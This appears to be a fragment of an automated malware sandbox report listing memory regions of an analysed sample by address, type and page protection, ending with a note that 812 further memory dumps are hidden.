4F0E000
|
stack
|
page read and write
|
||
|
2D9C000
|
heap
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
4F11000
|
heap
|
page read and write
|
||
|
22321000
|
direct allocation
|
page execute and read and write
|
||
|
4F1F000
|
heap
|
page read and write
|
||
|
47B1000
|
heap
|
page read and write
|
||
|
4F1B000
|
heap
|
page read and write
|
||
|
6FB0000
|
trusted library allocation
|
page read and write
|
||
|
1ACE55A5000
|
heap
|
page read and write
|
||
|
4015000
|
trusted library allocation
|
page execute and read and write
|
||
|
20410351000
|
heap
|
page read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
47B0000
|
heap
|
page read and write
|
||
|
6A46000
|
heap
|
page read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
3FAE000
|
stack
|
page read and write
|
||
|
21B00000
|
direct allocation
|
page read and write
|
||
|
2D9F000
|
stack
|
page read and write
|
||
|
47EF000
|
heap
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
7FFD343F6000
|
trusted library allocation
|
page execute and read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
416E000
|
stack
|
page read and write
|
||
|
21AF0000
|
direct allocation
|
page read and write
|
||
|
1ACFDA57000
|
heap
|
page read and write
|
||
|
2040E42B000
|
heap
|
page read and write
|
||
|
2040E437000
|
heap
|
page read and write
|
||
|
A745000
|
direct allocation
|
page execute and read and write
|
||
|
2A79000
|
heap
|
page read and write
|
||
|
2CA5000
|
heap
|
page read and write
|
||
|
34BE000
|
unkown
|
page read and write
|
||
|
7030000
|
trusted library allocation
|
page read and write
|
||
|
2919000
|
heap
|
page read and write
|
||
|
29BF000
|
stack
|
page read and write
|
||
|
4F1F000
|
heap
|
page read and write
|
||
|
26E4000
|
heap
|
page read and write
|
||
|
22652000
|
heap
|
page read and write
|
||
|
204101DC000
|
heap
|
page read and write
|
||
|
6F1E000
|
stack
|
page read and write
|
||
|
7FFD345D0000
|
trusted library allocation
|
page read and write
|
||
|
67D0000
|
direct allocation
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
4F5E000
|
heap
|
page read and write
|
||
|
307B000
|
heap
|
page read and write
|
||
|
1ACE5540000
|
heap
|
page read and write
|
||
|
407E000
|
stack
|
page read and write
|
||
|
20410351000
|
heap
|
page read and write
|
||
|
1ACE3AB7000
|
heap
|
page read and write
|
||
|
47B0000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
1ACE5EF7000
|
trusted library allocation
|
page read and write
|
||
|
204101A1000
|
heap
|
page read and write
|
||
|
47C6000
|
heap
|
page read and write
|
||
|
6870000
|
heap
|
page read and write
|
||
|
307A000
|
heap
|
page read and write
|
||
|
2CA5000
|
heap
|
page read and write
|
||
|
2040E52C000
|
heap
|
page read and write
|
||
|
7FFD345B0000
|
trusted library allocation
|
page read and write
|
||
|
30A0000
|
heap
|
page read and write
|
||
|
17F14F9000
|
stack
|
page read and write
|
||
|
6BBE000
|
stack
|
page read and write
|
||
|
4F4D000
|
heap
|
page read and write
|
||
|
4F1F000
|
heap
|
page read and write
|
||
|
204101C4000
|
heap
|
page read and write
|
||
|
4F19000
|
heap
|
page read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
30D0000
|
heap
|
page read and write
|
||
|
2478000
|
stack
|
page read and write
|
||
|
6790000
|
direct allocation
|
page read and write
|
||
|
6EDF000
|
stack
|
page read and write
|
||
|
6A46000
|
heap
|
page read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
6D71000
|
heap
|
page read and write
|
||
|
1ACFD5BB000
|
heap
|
page read and write
|
||
|
2040E525000
|
heap
|
page read and write
|
||
|
4F1C000
|
heap
|
page read and write
|
||
|
7FFD34640000
|
trusted library allocation
|
page read and write
|
||
|
17F127E000
|
stack
|
page read and write
|
||
|
7FFD34320000
|
trusted library allocation
|
page read and write
|
||
|
227E0000
|
unclassified section
|
page execute and read and write
|
||
|
1ACFDD12000
|
heap
|
page read and write
|
||
|
5180000
|
heap
|
page read and write
|
||
|
1ACFDCB2000
|
heap
|
page read and write
|
||
|
17F137F000
|
stack
|
page read and write
|
||
|
2040E490000
|
heap
|
page read and write
|
||
|
2040E3E3000
|
heap
|
page read and write
|
||
|
307A000
|
heap
|
page read and write
|
||
|
2216F000
|
stack
|
page read and write
|
||
|
1ACE7209000
|
trusted library allocation
|
page read and write
|
||
|
22653000
|
heap
|
page read and write
|
||
|
57C5000
|
remote allocation
|
page execute and read and write
|
There are 812 hidden memdumps, click here to show them.